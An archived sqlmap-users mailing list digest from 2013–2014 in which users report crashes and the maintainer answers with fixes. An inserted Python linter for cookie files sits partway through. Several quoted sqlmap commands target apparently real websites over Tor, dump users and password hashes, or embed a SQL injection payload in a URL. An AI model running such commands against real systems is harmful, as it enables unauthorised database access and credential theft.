> > > > ./sqlmap.py --ignore-proxy --force-ssl --beep \
> > > > --threads=8 -v 6 --load-cookies=$WD/cookie-file \
> > > > --level=2 --risk=2 -r $REQUEST
> > > >
> > > > The content of the file $REQUEST is:
> > > >
> > > > POST <URL> HTTP/1.1
> > > > Host: <HOST>
> > > > User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US) AppleWebKit/525.13 (KHTML, like Gecko)
> > > > Chrome/0.2.149.6 Safari/525.13
> > > > Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
> > > > Accept-Language: en-US,en;q=0.5
> > > > Accept-Encoding: gzip, deflate
> > > > Referer: <Referer>
> > > > Cookie: JSESSIONID=C2E79FD79E967D3E3BA52EE67F8824D7
> > > > Connection: keep-alive
> > > > Content-Type: application/x-www-form-urlencoded
> > > > Content-Length: 67
> > > >
> > > > <abunchofpostparams>
> > > >
> > > >
> > > > No hints that cookie-file is not in correct format (I've been through this,
> > > > at least I think I so ;) ).
> > > >
> > > > Any insight would be much appreciated.
> > > >
> > > >
> > > > Cheers,
> > > >
> > > > Dirk
> > > >
> > > >
> > > > ------------------------------------------------------------------------------
> > > > Precog is a next-generation analytics platform capable of advanced
> > > > analytics on semi-structured data. The platform includes APIs for building
> > > > apps and a phenomenal toolset for data science. Developers can use
> > > > our toolset for easy data analysis & visualization. Get a free account!
> > > > http://www2.precog.com/precogplatform/slashdotnewsletter
> > > > _______________________________________________
> > > > sqlmap-users mailing list
> > > > sql...@li...
> > > > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
> > > >
> > > >
> > > > --
> > > > Miroslav Stampar
> > > > http://about.me/stamparm
> > > >
> > >
> > > --
> > > Miroslav Stampar
> > > http://about.me/stamparm
> > >
> >
> > --
> > Miroslav Stampar
> > http://about.me/stamparm
> >
> >
> > --
> > Miroslav Stampar
> > http://about.me/stamparm
> >
>
> --
> Miroslav Stampar
> http://about.me/stamparm

------------------------------

Message: 6
Date: Mon, 15 Apr 2013 14:01:01 -0700
From: <co...@5i...>
Subject: [sqlmap-users] --host parameter
To: sql...@li...
Message-ID: <201...@em...>
Content-Type: text/plain; charset="utf-8"

Hello,
the --host doesn't work as expected, or I am doing something wrong:


this works as expected:

./sqlmap.py --url='http://i.csland.ro/index.php?id=0'

sqlmap/1.0-dev-840ee26 - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 23:57:15

[23:57:15] [INFO] testing connection to the target URL
[23:57:15] [INFO] heuristics detected web page charset 'ascii'
[23:57:15] [INFO] testing if the target URL is stable. This can take a couple of seconds
[23:57:16] [INFO] target URL is stable
[23:57:16] [INFO] testing if GET parameter 'id' is dynamic
[23:57:16] [INFO] confirming that GET parameter 'id' is dynamic
[23:57:16] [INFO] GET parameter 'id' is dynamic
[23:57:16] [INFO] heuristic (basic) test shows that GET parameter 'id' might be injectable (possible DBMS: 'MySQL')
[23:57:16] [INFO] testing for SQL injection on GET parameter 'id'


....


this doesn't work as expected:

./sqlmap.py --host='i.csland.ro' --url='http://188.240.236.15/index.php?id=0'

sqlmap/1.0-dev-840ee26 - automatic SQL injection and database takeover tool
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 23:58:03

[23:58:03] [INFO] testing connection to the target URL
[23:58:03] [CRITICAL] page not found (404)
it is not recommended to continue in this kind of cases. Do you want to quit and make sure that everything is set up properly? [Y/n]
[23:58:05] [WARNING] HTTP error codes detected during run:

............


Of course i.csland.ro resolves to 188.240.236.15. Any idea?

Thanks.

------------------------------

Message: 7
Date: Tue, 16 Apr 2013 09:12:05 +1100
From: ???????? ?????? <vo...@s2...>
Subject: [sqlmap-users] Sqlmap and direct connect error
To: sql...@li...
Message-ID: <C59...@s2...>
Content-Type: text/plain; charset=us-ascii

Hi!

This bug detected if add direct param.

python sqlmap.py -d "mysql://yakimov:pass@127.0.0.1:3306/tech" -u "http://s25.ru/index.phtml?center=7&id=186" --random-agent --tor --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables --exclude-sysdbs


[01:48:28] [CRITICAL] unhandled exception in sqlmap/1.0-dev-de99717, retry your run with the latest development version from the GitHub repository. If the exception persists, please send by e-mail to 'sql...@li...' or open a new issue at 'https://github.com/sqlmapproject/sqlmap/issues/new' with the following text and any information required to reproduce the bug. The developers will try to reproduce the bug, fix it accordingly and get back to you.
sqlmap version: 1.0-dev-de99717
Python version: 2.7.3
Operating system: posix
Command line: sqlmap.py -d **************************************************** -u http://s25.ru/index.phtml?center=7&id=186 --random-agent --tor --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables --exclude-sysdbs
Technique: None
Back-end DBMS: MySQL (identified)
Traceback (most recent call last):
  File "sqlmap.py", line 87, in main
    start()
  File "/home/yakimov/sqlmap/lib/controller/controller.py", line 248, in start
    action()
  File "/home/yakimov/sqlmap/lib/controller/action.py", line 32, in action
    setHandler()
  File "/home/yakimov/sqlmap/lib/controller/handler.py", line 95, in setHandler
    conf.dbmsConnector.connect()
  File "/home/yakimov/sqlmap/plugins/dbms/mysql/connector.py", line 38, in connect
    self.connector = pymysql.connect(host=self.hostname, user=self.user, passwd=self.password, db=self.db, port=self.port, connect_timeout=conf.timeout, use_unicode=True)
  File "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/__init__.py", line 93, in Connect
    return Connection(*args, **kwargs)
  File "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py", line 584, in __init__
    self._connect()
  File "/home/yakimov/.local/lib/python2.7/site-packages/PyMySQL-0.5-py2.7.egg/pymysql/connections.py", line 739, in _connect
    sock.connect((self.host, self.port))
  File "/home/yakimov/sqlmap/thirdparty/socks/socks.py", line 365, in connect
    raise GeneralProxyError((5, _generalerrors[5]))
GeneralProxyError: (5, 'bad input')

------------------------------

Message: 8
Date: Tue, 16 Apr 2013 14:19:18 +0200
From: Miroslav Stampar <mir...@gm...>
Subject: Re: [sqlmap-users] --host parameter
To: co...@5i...
Cc: SqlMap List <sql...@li...>
Message-ID: <CA+...@ma...>
Content-Type: text/plain; charset="iso-8859-1"

Hi.

Thank you for your report and find it fixed with the latest commit [1].

Kind regards,
Miroslav Stampar

[1] https://github.com/sqlmapproject/sqlmap/commit/6fed1921edf1baaf23a54fbe340ff3781fc05c86


On Mon, Apr 15, 2013 at 11:01 PM, <co...@5i...> wrote:

> Hello,
> the --host doesn't work as expected, or I am doing something wrong:
>
>
> this works as expected:
>
> ./sqlmap.py --url='http://i.csland.ro/index.php?id=0'
>
> sqlmap/1.0-dev-840ee26 - automatic SQL injection and database
> takeover tool
> http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without
> prior mutual consent is illegal. It is the end user's responsibility to
> obey all applicable local, state and federal laws. Developers assume no
> liability and are not responsible for any misuse or damage caused by
> this program
>
> [*] starting at 23:57:15
>
> [23:57:15] [INFO] testing connection to the target URL
> [23:57:15] [INFO] heuristics detected web page charset 'ascii'
> [23:57:15] [INFO] testing if the target URL is stable. This can take a
> couple of seconds
> [23:57:16] [INFO] target URL is stable
> [23:57:16] [INFO] testing if GET parameter 'id' is dynamic
> [23:57:16] [INFO] confirming that GET parameter 'id' is dynamic
> [23:57:16] [INFO] GET parameter 'id' is dynamic
> [23:57:16] [INFO] heuristic (basic) test shows that GET parameter 'id'
> might be injectable (possible DBMS: 'MySQL')
> [23:57:16] [INFO] testing for SQL injection on GET parameter 'id'
>
>
> ....
>
>
> this doesn't work as expected:
>
> ./sqlmap.py --host='i.csland.ro'
> --url='http://188.240.236.15/index.php?id=0'
>
> sqlmap/1.0-dev-840ee26 - automatic SQL injection and database
> takeover tool
> http://sqlmap.org
>
> [!] legal disclaimer: Usage of sqlmap for attacking targets without
> prior mutual consent is illegal. It is the end user's responsibility to
> obey all applicable local, state and federal laws. Developers assume no
> liability and are not responsible for any misuse or damage caused by
> this program
>
> [*] starting at 23:58:03
>
> [23:58:03] [INFO] testing connection to the target URL
> [23:58:03] [CRITICAL] page not found (404)
> it is not recommended to continue in this kind of cases. Do you want to
> quit and make sure that everything is set up properly? [Y/n]
> [23:58:05] [WARNING] HTTP error codes detected during run:
>
> ............
>
>
> Of course i.csland.ro resolves to 188.240.236.15. Any idea?
>
> Thanks.
>
>
>
> ------------------------------------------------------------------------------
> Precog is a next-generation analytics platform capable of advanced
> analytics on semi-structured data. The platform includes APIs for building
> apps and a phenomenal toolset for data science. Developers can use
> our toolset for easy data analysis & visualization. Get a free account!
> http://www2.precog.com/precogplatform/slashdotnewsletter
> _______________________________________________
> sqlmap-users mailing list
> sql...@li...
> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>

--
Miroslav Stampar
http://about.me/stamparm
-------------- next part --------------
An HTML attachment was scrubbed...

------------------------------

Message: 9
Date: Tue, 16 Apr 2013 14:33:33 +0200
From: Miroslav Stampar <mir...@gm...>
Subject: Re: [sqlmap-users] Sqlmap and direct connect error
To: ???????? ?????? <vo...@s2...>
Cc: SqlMap List <sql...@li...>
Message-ID: <CA+9yoX0rxH+=vZuYiArFNZhK1xhwos=SNhMqEmFmnCafw-ot=g...@ma...>
Content-Type: text/plain; charset="koi8-r"

Hi Vladimir.

Find it "patched" with the latest commit [1]. Basically, those combinations should not be allowed (-d and --url; -d and --tor; etc.) and now we've added new option validation checks for this kind of cases.

Kind regards,
Miroslav Stampar

[1] https://github.com/sqlmapproject/sqlmap/commit/c73489aff3861f1cac7de41494a296c1095e141a


On Tue, Apr 16, 2013 at 12:12 AM, ???????? ?????? <vo...@s2...> wrote:

> Hi!
>
> This bug detected if add direct param.
>
> python sqlmap.py -d "mysql://yakimov:pass@127.0.0.1:3306/tech" -u "
> http://s25.ru/index.phtml?center=7&id=186" --random-agent --tor
> --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables
> --exclude-sysdbs
>
>
> [01:48:28] [CRITICAL] unhandled exception in sqlmap/1.0-dev-de99717, retry
> your run with the latest development version from the GitHub repository. If
> the exception persists, please send by e-mail to '
> sql...@li...' or open a new issue at '
> https://github.com/sqlmapproject/sqlmap/issues/new' with the following
> text and any information required to reproduce the bug. The developers will
> try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev-de99717
> Python version: 2.7.3
> Operating system: posix
> Command line: sqlmap.py -d
> **************************************************** -u
> http://s25.ru/index.phtml?center=7&id=186 --random-agent --tor
> --tor-type=SOCKS5 --tor-port=49832 --dbms=MySQL --os=Linux --tables
> --exclude-sysdbs
> Technique: None
> Back-end DBMS: MySQL (identified)
> Traceback (most recent call last):
> File "sqlmap.py", line 87, in main
> start()
> File "/home/yakimov/sqlmap/lib/controller/controller.py", line 248, in
> start
> action()
> File "/home/yakimov/sqlmap/lib/controller/action.py", line 32, in action
> setHandler()
> File "/home/yakimov/sqlmap/lib/controller/handler.py", line 95, in
> setHandler
> conf.dbmsConnector.connect()
> File "/home/yakimov/sqlmap/plugins/dbms/mysql/connector.py", li... [truncated message content]
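
The cookie-file problems discussed in the digest above (the `assert domain_specified == initial_dot` traceback and the disagreement over an expiry of `0`) can be caught before a file is handed to a Netscape-format parser. The linter below is an added example, not sqlmap's or cookielib's code; the function name, finding codes and the sample file (host `example.test`, constructed) are assumptions.

```python
import time
from collections import namedtuple

Finding = namedtuple("Finding", "line severity code message")


def lint_cookie_file(text, now=None):
    """Check Netscape-format cookie lines and return a list of Finding tuples."""
    now = int(time.time()) if now is None else int(now)
    findings = []

    for lineno, line in enumerate(text.split("\n"), 1):
        line = line.rstrip("\r")
        if not line.strip() or line.lstrip().startswith("#"):
            continue  # comments and blank lines carry no cookie

        # The format is exactly seven TAB-separated fields per cookie.
        fields = line.split("\t")
        if len(fields) != 7:
            hint = ""
            if len(line.split()) == 7:
                hint = "; fields look blank-separated, the format needs tabs"
            findings.append(Finding(lineno, "error", "FIELDS",
                "expected 7 tab-separated fields, got %d%s" % (len(fields), hint)))
            continue

        domain, domain_flag, _path, secure, expires, _name, _value = fields

        flags_ok = True
        for label, flag in (("domain flag", domain_flag), ("secure flag", secure)):
            if flag not in ("TRUE", "FALSE"):
                flags_ok = False
                findings.append(Finding(lineno, "error", "FLAG",
                    "%s must be TRUE or FALSE, got %r" % (label, flag)))

        # This is the condition behind the AssertionError in the thread:
        # the second field must be TRUE exactly when the domain starts with a dot.
        if flags_ok and (domain_flag == "TRUE") != domain.startswith("."):
            findings.append(Finding(lineno, "error", "DOMAIN_FLAG",
                "domain %r has domain flag %s; the flag must be TRUE only for a "
                "leading-dot domain" % (domain, domain_flag)))

        if expires == "":
            continue  # an empty expiry is how Python's cookie jar marks a session cookie
        try:
            expiry = int(expires)
        except ValueError:
            findings.append(Finding(lineno, "error", "EXPIRES",
                "expiry %r is not a UNIX timestamp" % expires))
            continue

        if expiry == 0:
            # wget --keep-session-cookies writes 0 here; a parser that compares the
            # field with the current time reports the same cookie as expired.
            findings.append(Finding(lineno, "warning", "SESSION",
                "expiry 0: session cookie for wget, expired for a time comparison"))
        elif expiry <= now:
            findings.append(Finding(lineno, "warning", "EXPIRED",
                "expiry %d is not after the reference time %d" % (expiry, now)))

    return findings


# Constructed sample file; each cookie line mirrors one case from the thread.
SAMPLE = "\n".join([
    "# Netscape HTTP Cookie File",
    ".example.test\tTRUE\t/\tFALSE\t1429089794\tSRCHD\tD=1",
    "www.example.test\tFALSE\t/\tTRUE\t0\tJSESSIONID\tAAAA",
    "www.example.test\tTRUE\t/app\tTRUE\t9999999999\tJSESSIONID\tBBBB",
    "www.example.test FALSE / TRUE 0 JSESSIONID CCCC",
    ".example.test\tTRUE\t/\tFALSE\t1000000000\tOLD\tx",
])

if __name__ == "__main__":
    # Reference time fixed to April 2013 so the output does not depend on the clock.
    for finding in lint_cookie_file(SAMPLE, now=1366000000):
        print("line %d: %s %s: %s" % finding)
```
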
From: Miroslav S. <mir...@gm...> - 2014-05-17 13:03:50
Hi.

Thank you for your report. Please try to update to the latest revision and run it again (use --fresh-queries just in case).

Kind regards,
Miroslav Stampar


On Sat, May 17, 2014 at 10:19 AM, Bob <sto...@qq...> wrote:

>
> Hi friends,
>
> I have use sqlmap . with the latest version .
>
> it occur the problem .
>
> Could you can fix this for me?
>
> thanks
>
> best regards
>
> Robert
>
> [16:17:09] [CRITICAL] unhandled exception in sqlmap/1.0-dev-c181e90, retry
> your run with the latest development version from the GitHub repository. If
> the exception persists, please send by e-mail to '
> sql...@li...' or open a new issue at '
> https://github.com/sqlmapproject/sqlmap/issues/new' with the following
> text and any information required to reproduce the bug. The developers will
> try to reproduce the bug, fix it accordingly and get back to you.
> sqlmap version: 1.0-dev-c181e90
> Python version: 2.7.3
> Operating system: posix
> Command line: ./sqlmap.py -u
> ******************************************************************* -p id
> --dbms=MySQL --risk=3 --level=5 -a
> Technique: UNION
> Back-end DBMS: MySQL (fingerprinted)
> Traceback (most recent call last):
> File "./sqlmap.py", line 99, in main
> start()
> File
> "/pentest1/database/sqlmap/sqlmap-dev/lib/controller/controller.py", line
> 585, in start
> action()
> File "/pentest1/database/sqlmap/sqlmap-dev/lib/controller/action.py",
> line 130, in action
> conf.dbmsHandler.dumpAll()
> File "/pentest1/database/sqlmap/sqlmap-dev/plugins/generic/entries.py",
> line 367, in dumpAll
> self.getTables()
> File
> "/pentest1/database/sqlmap/sqlmap-dev/plugins/generic/databases.py", line
> 215, in getTables
> dbs = self.getDbs()
> File
> "/pentest1/database/sqlmap/sqlmap-dev/plugins/generic/databases.py", line
> 175, in getDbs
> kb.data.cachedDbs = list(set(kb.data.cachedDbs))
> TypeError: unhashable type: 'list'
>
> ------------------
>
>
>
>
> ------------------ Original Message ------------------
> *From:* "Miroslav Stampar";<mir...@gm...>;
> *Sent:* Tuesday, May 13, 2014 9:40 PM
> *To:* "Bob"<sto...@qq...>;
> *Cc:* "SqlMap List"<sql...@li...>;
> *Subject:* Re: Re: [sqlmap-users] sqlmap-user event not found error
>
> Hi Bob.
>
> It's a bash problem (reproduced it this moment). Using single quotes (')
> instead of double quotes (") should solve this issue.
>
> Kind regards,
> Miroslav Stampar
>
>
> On Tue, May 13, 2014 at 5:05 AM, Bob <sto...@qq...> wrote:
>
>>
>> Hi Miroslav,
>>
>> Thanks for your email,
>>
>> but still the same after i tried sqlmap -u ".."
>>
>>
>>
>> sqlmap -u "
>> http://www.xxxx.com/xxx/xxxx/default!search.do?keyword=&toUrl=http%3A%2F%2Fwww.diylooks.com%2Foem%2Fproduct%2Fdefault%21view.do%3Fid%3D270549&qty=1&input_mailbar=98%22%20OR%20%2298%22%3D%2298&input_mail=aa
>> "
>> bash: !search.do?keyword=: event not found
>>
>>
>> best regards
>> bob
>> ------------------
>>
>>
>>
>>
>> ------------------ Original Message ------------------
>> *From:* "Miroslav Stampar";<mir...@gm...>;
>> *Sent:* Sunday, May 11, 2014 10:38 PM
>> *To:* "Bob"<sto...@qq...>;
>> *Cc:* "SqlMap List"<sql...@li...>;
>> *Subject:* Re: [sqlmap-users] sqlmap-user event not found error
>>
>> Hi Bob.
>>
>> Please enclose the url part with quotes (e.g. ./sqlmap.py -u "..." ...)
>>
>> Kind regards,
>> Miroslav Stampar
>>
>>
>> On Sun, May 11, 2014 at 8:32 AM, Bob <sto...@qq...> wrote:
>>
>>> Hi friend,
>>>
>>> I have problem with ! inside URL .
>>>
>>> /sqlmap.py -u
>>> http://www.xxxx.com/xxx/xxxx/default!search.do?keyword=&toUrl=http%3A%2F%2Fwww.diylooks.com%2Foem%2Fproduct%2Fdefault%21view.do%3Fid%3D270549&qty=1&input_mailbar=98%22%20OR%20%2298%22%3D%2298&input_mail=-p input_mailbar --dbms=MySQL --risk=3 --level=5 -o --param-del=
>>> bash: !search.do?keyword=: event not found
>>>
>>> How should i do ?
>>>
>>> thanks
>>>
>>> bob
>>> ------------------
>>>
>>>
>>>
>>>
>>> ------------------ Original ------------------
>>> *From: * "Miroslav Stampar";<mir...@gm...>;
>>> *Date: * Fri, May 31, 2013 03:00 AM
>>> *To: * "Bob"<sto...@qq...>;
>>> *Cc: * "sqlmap-users"<sql...@li...>;
>>> *Subject: * Re: [sqlmap-users] sqlmap-users Digest, Vol 31, Issue 1
>>>
>>> Hi.
>>> Have you been able to retrieve user names normally? I mean, were they
>>> normally displayed in console output?
>>> Also, is boolean technique the only one detected by sqlmap in your case
>>> (or maybe UNION)?
>>> Kind regards,
>>> Miroslav Stampar
>>>
>>>
>>> On Thu, May 30, 2013 at 4:57 PM, Bob <sto...@qq...> wrote:
>>>
>>>> Hi friend,
>>>>
>>>>
>>>> Could you help me with this bug?
>>>>
>>>>
>>>> [22:54:12] [CRITICAL] unhandled exception in sqlmap/1.0-dev, retry your
>>>> run with the latest development version from the GitHub repository. If the
>>>> exception persists, please send by e-mail to '
>>>> sql...@li...' or open a new issue at '
>>>> https://github.com/sqlmapproject/sqlmap/issues/new' with the following
>>>> text and any information required to reproduce the bug. The developers will
>>>> try to reproduce the bug, fix it accordingly and get back to you.
>>>> sqlmap version: 1.0-dev
>>>> Python version: 2.7.3
>>>> Operating system: posix
>>>> Command line: ./sqlmap -u
>>>> ***********************************************
>>>> --data=__VIEWSTATE=%2FwEPDwUJNzcyNzA5MTcxD2QWAmYPZBYCAgMPZBYCAgUPZBYCAg8PPCsAEQIADxYEHgtfIURhdGFCb3VuZGceC18hSXRlbUNvdW50ZmQBEBYAFgAWAGQYAQUaY3RsMDAkTWFpbkNvbnRlbnQkRGdSZXN1bHQPPCsADAEIZmTqSkxVHfCvk8H514IG2vidRqlanHHD7kZRl389CeOupw%3D%3D&__EVENTVALIDATION=%2FwEWCAK%2BjdvyCQLM8NjFBQKgo%2F%2FzCgKumJP3BALizcLsAwL%2Bq8zvCgKsq6%2F4DwLTytO4BPwtq4Qe7jKJMNFTIKI0vDR6PinuEV%2BLf13FWcmth6Av&ctl00%24MainContent%24TxtContCode=ZAP&ctl00%24MainContent%24TxtItemCode=ZAP&ctl00%24MainContent%24BtnFind=%E6%9F%A5%E8%AF%A2&ctl00%24MainContent%24TxtTestCustname=ZAP&ctl00%24MainContent%24TxtItemName=ZAP&ctl00%24MainContent%24TxtCheckManuCrock=ZAP&ctl00%24MainContent%24TxtCheckNo=ZAP
>>>> -p ctl00%24MainContent%24TxtContCode -o --level 3 --risk 5 --dbms=Microsoft
>>>> SQL Server --users --passwords
>>>> Technique: BOOLEAN
>>>> Back-end DBMS: Microsoft SQL Server (fingerprinted)
>>>> Traceback (most recent call last):
>>>> File "./sqlmap", line 87, in main
>>>> start()
>>>> File "/usr/share/sqlmap/lib/controller/controller.py", line 572, in
>>>> start
>>>> action()
>>>> File "/usr/share/sqlmap/lib/controller/action.py", line 81, in action
>>>> conf.dbmsHandler.getPasswordHashes(), "password hash",
>>>> CONTENT_TYPE.PASSWORDS)
>>>> File "/usr/share/sqlmap/plugins/generic/users.py", line 243, in
>>>> getPasswordHashes
>>>> if user in retrievedUsers:
>>>> TypeError: unhashable type: 'list'
>>>>
>>>> [*] shutting down at 22:54:12
>>>> Thanks
>>>>
>>>> BOB
>>>>
>>>>
>>>> ------------------ Original ------------------
>>>> *From: * "sqlmap-users-request"<
>>>> sql...@li...>;
>>>> *Date: * May 29, 2013
>>>> *To: * "sqlmap-users"<sql...@li...>;
>>>> *Subject: * sqlmap-users Digest, Vol 31, Issue 1
>>>>
>>>> Send sqlmap-users mailing list submissions to
>>>> sql...@li...
>>>>
>>>> To subscribe or unsubscribe via the World Wide Web, visit
>>>> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>> or, via email, send a message with subject or body 'help' to
>>>> sql...@li...
>>>>
>>>> You can reach the person managing the list at
>>>> sql...@li...
>>>>
>>>> When replying, please edit your Subject line so it is more specific
>>>> than "Re: Contents of sqlmap-users digest..."
>>>>
>>>>
>>>> Today's Topics:
>>>>
>>>> 1. Re: Feature request (David Guimaraes)
>>>> 2. Re: --load-cookies (Dirk Wetter)
>>>> 3. Re: --load-cookies (Miroslav Stampar)
>>>> 4. Re: Patch for /task/<task_id>/delete in clean_filesystem
>>>> (Miroslav Stampar)
>>>> 5. Re: --load-cookies (Dirk Wetter)
>>>> 6. --host parameter (co...@5i...)
>>>> 7. Sqlmap and direct connect error (???????? ??????)
>>>> 8. Re: --host parameter (Miroslav Stampar)
>>>> 9. Re: Sqlmap and direct connect error (Miroslav Stampar)
>>>> 10. feature request: offline mode for --dns-domain? (buawig)
>>>> 11. feature request: --dns-domain for non-root users (--dns-port)
>>>> (buawig)
>>>> 12. Domain credentials (Brian Milliron)
>>>> 13. Re: Domain credentials (Brandon Perry)
>>>> 14. Re: feature request: offline mode for --dns-domain?
>>>> (Miroslav Stampar)
>>>> 15. Re: Domain credentials (Miroslav Stampar)
>>>> 16. Re: feature request: fetch DNS queries from DNS server via
>>>> HTTP (buawig)
>>>> 17. Re: feature request: fetch DNS queries from DNS server via
>>>> HTTP (Miroslav Stampar)
>>>> 18. MySQL error based technique bug (Konrads Smelkovs)
>>>> 19. Re: MySQL error based technique bug (Miroslav Stampar)
>>>> 20. SQLmap crashing (Phillip Wylie)
>>>> 21. Re: SQLmap crashing (Miroslav Stampar)
>>>> 22. Custom injection payload in POST (Marcell Fodor)
>>>> 23. Re: SQLmap crashing (Miroslav Stampar)
>>>> 24. I got error on windows (warezhacking)
>>>> 25. Appending to a dump (Stephen Shkardoon)
>>>> 26. Re: Appending to a dump (Miroslav Stampar)
>>>> 27. Re: Appending to a dump (Stephen Shkardoon)
>>>> 28. Re: Appending to a dump (Miroslav Stampar)
>>>> 29. --ignore-404 ? (buawig)
>>>> 30. PostgreSQL: substr('string', 1, 1) vs. substring('string'
>>>> from 1 for 1) (buawig)
>>>> 31. Re: PostgreSQL: substr('string', 1, 1) vs. substring('string'
>>>> from 1 for 1) (Miroslav Stampar)
>>>> 32. Re: PostgreSQL: substr('string', 1, 1) vs. substring('string'
>>>> from 1 for 1) (Miroslav Stampar)
>>>> 33. Re: --ignore-404 ? (Miroslav Stampar)
>>>> 34. BUG...!!!! o.O (Isai Ofir Juarez Contreras)
>>>> 35. Re: BUG...!!!! o.O (Miroslav Stampar)
>>>> 36. gun...@gm... wants to follow you. Accept?
>>>> (gun...@gm...)
>>>> 37. Direct access to mysql database (Marcell Fodor)
>>>> 38. Re: Direct access to mysql database (Miroslav Stampar)
>>>> 39. ? Sqlmap Users, Marco Mirandola ti ha inviato un messaggio...
>>>> (Badoo)
>>>> 40. Not getting any sensitive data from database (Marcell Fodor)
>>>> 41. Re: Not getting any sensitive data from database
>>>> (Miroslav Stampar)
>>>> 42. unhandled exception (kvasilopoulos)
>>>> 43. [SQLMAP] Unhandled exception for IPv6
>>>> (e.n...@st...)
>>>> 44. Re: [SQLMAP] Unhandled exception for IPv6 (Miroslav Stampar)
>>>> 45. Re: unhandled exception (Miroslav Stampar)
>>>> 46. Passing SOAPAction in --header (Brandon Perry)
>>>> 47. Re: Passing SOAPAction in --header (Miroslav Stampar)
>>>> 48. Re: [SQLMAP] Unhandled exception for IPv6 (Miroslav Stampar)
>>>> 49. Blind SQL Injection question (Guy Dufour)
>>>> 50. Re: Blind SQL Injection question (Chris Oakley)
>>>> 51. Re: Passing SOAPAction in --header (Brandon Perry)
>>>> 52. Re: Passing SOAPAction in --header (Brandon Perry)
>>>> 53. Deploy&Create SSH/tunnel with compromised MSSQL server
>>>> (Alok Kumar)
>>>> 54. Re: Deploy&Create SSH/tunnel with compromised MSSQL server
>>>> (Brandon Perry)
>>>> 55. Re: Deploy&Create SSH/tunnel with compromised MSSQL server
>>>> (Alok Kumar)
>>>> 56. Re: Deploy&Create SSH/tunnel with compromised MSSQL server
>>>> (Brandon Perry)
>>>> 57. SQLMAP Bug (Joe O'Hara)
>>>> 58. Re: SQLMAP Bug (Miroslav Stampar)
>>>> 59. [CRITICAL] (Thai Thao)
>>>> 60. Re: [CRITICAL] (Miroslav Stampar)
>>>> 61. Providing multiple dbms (Sebastian Nerz)
>>>> 62. Re: Providing multiple dbms (Miroslav Stampar)
>>>>
>>>>
>>>> ----------------------------------------------------------------------
>>>>
>>>> Message: 1
>>>> Date: Sat, 13 Apr 2013 21:40:39 -0300
>>>> From: David Guimaraes <sk...@gm...>
>>>> Subject: Re: [sqlmap-users] Feature request
>>>> To: Miroslav Stampar <mir...@gm...>
>>>> Cc: SqlMap List <sql...@li...>
>>>> Message-ID:
>>>> <CAJ...@ma...>
>>>> Content-Type: text/plain; charset="iso-8859-1"
>>>>
>>>> Good question Miroslav.. I tried to think in something that can be
>>>> implemented without ruin sqlmap query schema, but I could not come to
>>>> any
>>>> conclusion... =(
>>>>
>>>> The thing is, sqlsus use a different approach to dump the data, making
>>>> this
>>>> kind of thing possible...
>>>>
>>>> The solution that I found in this particular scenario is to use sqlsus,
>>>> unfortunately...
>>>>
>>>> Regards.
>>>>
>>>> David
>>>>
>>>>
>>>> On Mon, Apr 1, 2013 at 6:35 PM, Miroslav Stampar <
>>>> mir...@gm...
>>>> > wrote:
>>>>
>>>> > Hi David.
>>>> >
>>>> > And what do you recommend to be done in case of query with length >
>>>> > max_inj_length?
>>>> >
>>>> > Kind regards,
>>>> > Miroslav Stampar
>>>> > On Apr 1, 2013 11:14 PM, "David Guimaraes" <sk...@gm...> wrote:
>>>> >
>>>> >> Hi, I am trying to perform sql injection on a web site but I can not
>>>> get
>>>> >> successful due to a size limitation on the query sent to the server.
>>>> The
>>>> >> server is limiting the size of query in 512 bytes only and sqlmap do
>>>> not
>>>> >> have any customization that allows me to bypass this restriction like
>>>> >> sqlsus "max_inj_length" parameter. Sqlsus has a feature called
>>>> "autoconf"
>>>> >> that measure the permitted query size.
>>>> >>
>>>> >> There is some chance to put this kind of feature in sqlmap?
>>>> >>
>>>> >> Thanks.
>>>> >>
>>>> >> --
>>>> >> David Gomes Guimarães
>>>> >>
>>>> >>
>>>> >>
>>>> ------------------------------------------------------------------------------
>>>> >> Own the Future-Intel® Level Up Game Demo Contest 2013
>>>> >> Rise to greatness in Intel's independent game demo contest.
>>>> >> Compete for recognition, cash, and the chance to get your game
>>>> >> on Steam. $5K grand prize plus 10 genre and skill prizes.
>>>> >> Submit your demo by 6/6/13. http://p.sf.net/sfu/intel_levelupd2d
>>>> >> _______________________________________________
>>>> >> sqlmap-users mailing list
>>>> >> sql...@li...
>>>> >> https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>>> >>
>>>> >>
>>>>
>>>>
>>>> --
>>>> David Gomes Guimarães
>>>> -------------- next part --------------
>>>> An HTML attachment was scrubbed...
>>>>
>>>> ------------------------------
>>>>
>>>> Message: 2
>>>> Date: Mon, 15 Apr 2013 11:36:37 +0200
>>>> From: Dirk Wetter <sp...@dr...>
>>>> Subject: Re: [sqlmap-users] --load-cookies
>>>> To: Miroslav Stampar <mir...@gm...>
>>>> Cc: SqlMap List <sql...@li...>
>>>> Message-ID: <516...@dr...>
>>>> Content-Type: text/plain; charset=ISO-8859-1
>>>>
>>>>
>>>>
>>>> On 04/14/2013 01:14 AM, Miroslav Stampar wrote:
>>>> > Nevertheless, with the latest commit that check should be
>>>> "neutralized" now. Could you please retry it now?
>>>>
>>>> thx, Miroslav. I tried (b6fee63) but this time the cookie parser lib
>>>> hiccups, using the same file:
>>>>
>>>> /usr/lib64/python2.7/_MozillaCookieJar.py:109: UserWarning: cookielib
>>>> bug!
